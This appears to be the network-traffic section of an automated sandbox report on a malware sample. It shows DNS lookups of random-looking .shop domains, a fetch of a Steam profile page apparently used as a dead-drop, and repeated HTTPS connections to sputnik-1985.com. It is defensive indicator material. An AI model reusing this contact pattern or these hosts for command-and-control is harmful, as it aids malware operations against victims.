Jan 11, 2025 07:48:33.559156895 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:33.599340916 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:33.974169016 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:33.974188089 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:33.974211931 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:33.974225998 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:33.974239111 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:33.974251986 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:33.974261999 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:33.974289894 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:33.974328041 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:34.069288015 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:34.069313049 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:34.069363117 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:34.069391012 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:34.069415092 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:34.069433928 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:34.074347019 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:34.074409962 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:34.074433088 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:34.074453115 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:34.074476957 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:34.074515104 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:34.075155020 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:34.075171947 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:34.136643887 CET | 49708 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:34.136687040 CET | 443 | 49708 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:34.136763096 CET | 49708 | 443 | 192.168.2.10 | 104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.137554884 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.137572050 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.606312037 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.606385946 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.608057022 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.608068943 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.608326912 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.610022068 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.610044956 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.610105991 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.051529884 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.051628113 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.051691055 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.052386045 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.052386045 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.052401066 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.052412987 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.228096008 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.228131056 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.232490063 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.232491016 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.232528925 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.696652889 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.696742058 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.697907925 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.697920084 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.698157072 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.699331045 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.699331045 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.699400902 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204118013 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204205990 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204236984 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204281092 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204294920 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204344988 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204375029 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204402924 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204451084 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204468012 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204741001 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204771996 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204817057 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204824924 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204869032 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.208811998 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.251663923 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.251682043 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292499065 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292593956 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292632103 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292673111 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292701960 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292716026 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292731047 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292771101 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.293931007 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.293947935 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.293956995 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.293962002 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.920243025 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.920296907 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.920366049 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.920816898 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.920830011 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.383824110 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.383900881 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.385644913 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.385652065 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.385945082 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.387861013 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.388886929 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.388916016 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.017416000 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.017513037 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.017927885 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.018033028 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.018047094 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.204125881 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.204138994 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.206338882 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.207207918 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.207216978 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.662805080 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.663033962 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.664165020 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.664171934 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.664441109 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.665529966 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.665657997 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.665685892 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.665747881 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.707335949 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:39.075666904 CET44349734104.21.80.1192.168.2.10
Jan 11, 2025 07:48:39.075751066 CET | 443 | 49734 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:39.075920105 CET | 49734 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:39.097028017 CET | 49734 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:39.097054005 CET | 443 | 49734 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:39.676345110 CET | 49743 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:39.676358938 CET | 443 | 49743 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:39.676467896 CET | 49743 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:39.676789999 CET | 49743 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:39.676800013 CET | 443 | 49743 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:40.133203030 CET | 443 | 49743 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:40.133318901 CET | 49743 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:40.134620905 CET | 49743 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:40.134633064 CET | 443 | 49743 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:40.134902954 CET | 443 | 49743 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:40.136074066 CET | 49743 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:40.136229038 CET | 49743 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:40.136254072 CET | 443 | 49743 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:40.136322021 CET | 49743 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:40.136331081 CET | 443 | 49743 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:40.624177933 CET | 443 | 49743 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:40.624285936 CET | 443 | 49743 | 104.21.80.1 | 192.168.2.10
Jan 11, 2025 07:48:40.624378920 CET | 49743 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:40.624490023 CET | 49743 | 443 | 192.168.2.10 | 104.21.80.1
Jan 11, 2025 07:48:40.624504089 CET | 443 | 49743 | 104.21.80.1 | 192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 07:48:32.441646099 CET | 51184 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 07:48:32.450208902 CET | 53 | 51184 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 07:48:32.453201056 CET | 53181 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 07:48:32.461771011 CET | 53 | 53181 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 07:48:32.465985060 CET | 61213 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 07:48:32.475630999 CET | 53 | 61213 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 07:48:32.480487108 CET | 50081 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 07:48:32.489180088 CET | 53 | 50081 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 07:48:32.490806103 CET | 58750 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 07:48:32.499675035 CET | 53 | 58750 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 07:48:32.501328945 CET | 63928 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 07:48:32.510358095 CET | 53 | 63928 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 07:48:32.512094975 CET | 62827 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 07:48:32.520801067 CET | 53 | 62827 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 07:48:32.522300959 CET | 50661 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 07:48:32.530841112 CET | 53 | 50661 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 07:48:32.532793045 CET | 61203 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 07:48:32.541631937 CET | 53 | 61203 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 07:48:32.543144941 CET | 49963 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 07:48:32.549899101 CET | 53 | 49963 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 07:48:34.091943026 CET | 57818 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 07:48:34.124991894 CET | 53 | 57818 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 07:48:32.441646099 CET | 192.168.2.10 | 1.1.1.1 | 0x74c7 | Standard query (0) | skidjazzyric.click | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.453201056 CET | 192.168.2.10 | 1.1.1.1 | 0x528 | Standard query (0) | soundtappysk.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.465985060 CET | 192.168.2.10 | 1.1.1.1 | 0x9492 | Standard query (0) | femalsabler.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.480487108 CET | 192.168.2.10 | 1.1.1.1 | 0x8304 | Standard query (0) | apporholis.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.490806103 CET | 192.168.2.10 | 1.1.1.1 | 0x9ee8 | Standard query (0) | crowdwarek.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.501328945 CET | 192.168.2.10 | 1.1.1.1 | 0xc69e | Standard query (0) | versersleep.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.512094975 CET | 192.168.2.10 | 1.1.1.1 | 0x8a49 | Standard query (0) | chipdonkeruz.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.522300959 CET | 192.168.2.10 | 1.1.1.1 | 0x222a | Standard query (0) | handscreamny.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.532793045 CET | 192.168.2.10 | 1.1.1.1 | 0x1a23 | Standard query (0) | robinsharez.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.543144941 CET | 192.168.2.10 | 1.1.1.1 | 0xcd2b | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:34.091943026 CET | 192.168.2.10 | 1.1.1.1 | 0x3c39 | Standard query (0) | sputnik-1985.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 07:48:32.450208902 CET | 1.1.1.1 | 192.168.2.10 | 0x74c7 | Name error (3) | skidjazzyric.click | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.461771011 CET | 1.1.1.1 | 192.168.2.10 | 0x528 | Name error (3) | soundtappysk.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.475630999 CET | 1.1.1.1 | 192.168.2.10 | 0x9492 | Name error (3) | femalsabler.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.489180088 CET | 1.1.1.1 | 192.168.2.10 | 0x8304 | Name error (3) | apporholis.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.499675035 CET | 1.1.1.1 | 192.168.2.10 | 0x9ee8 | Name error (3) | crowdwarek.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.510358095 CET | 1.1.1.1 | 192.168.2.10 | 0xc69e | Name error (3) | versersleep.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.520801067 CET | 1.1.1.1 | 192.168.2.10 | 0x8a49 | Name error (3) | chipdonkeruz.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.530841112 CET | 1.1.1.1 | 192.168.2.10 | 0x222a | Name error (3) | handscreamny.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.541631937 CET | 1.1.1.1 | 192.168.2.10 | 0x1a23 | Name error (3) | robinsharez.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:32.549899101 CET | 1.1.1.1 | 192.168.2.10 | 0xcd2b | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:34.124991894 CET | 1.1.1.1 | 192.168.2.10 | 0x3c39 | No error (0) | sputnik-1985.com | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:34.124991894 CET | 1.1.1.1 | 192.168.2.10 | 0x3c39 | No error (0) | sputnik-1985.com | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:34.124991894 CET | 1.1.1.1 | 192.168.2.10 | 0x3c39 | No error (0) | sputnik-1985.com | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:34.124991894 CET | 1.1.1.1 | 192.168.2.10 | 0x3c39 | No error (0) | sputnik-1985.com | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:34.124991894 CET | 1.1.1.1 | 192.168.2.10 | 0x3c39 | No error (0) | sputnik-1985.com | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:34.124991894 CET | 1.1.1.1 | 192.168.2.10 | 0x3c39 | No error (0) | sputnik-1985.com | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 07:48:34.124991894 CET | 1.1.1.1 | 192.168.2.10 | 0x3c39 | No error (0) | sputnik-1985.com | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• sputnik-1985.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49706 | 104.102.49.254 | 443 | 7464 | C:\Users\user\Desktop\xNuh0DUJaG.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 06:48:33 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2025-01-11 06:48:33 UTC | 1905 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Sat, 11 Jan 2025 06:48:33 GMT
    Content-Length: 35126
    Connection: close
    Set-Cookie: sessionid=5abb7e8fb5f032eedda81f11; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-11 06:48:33 UTC | 14479 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-11 06:48:34 UTC | 16384 | IN | Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
    Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-11 06:48:34 UTC | 3768 | IN | Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
    Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
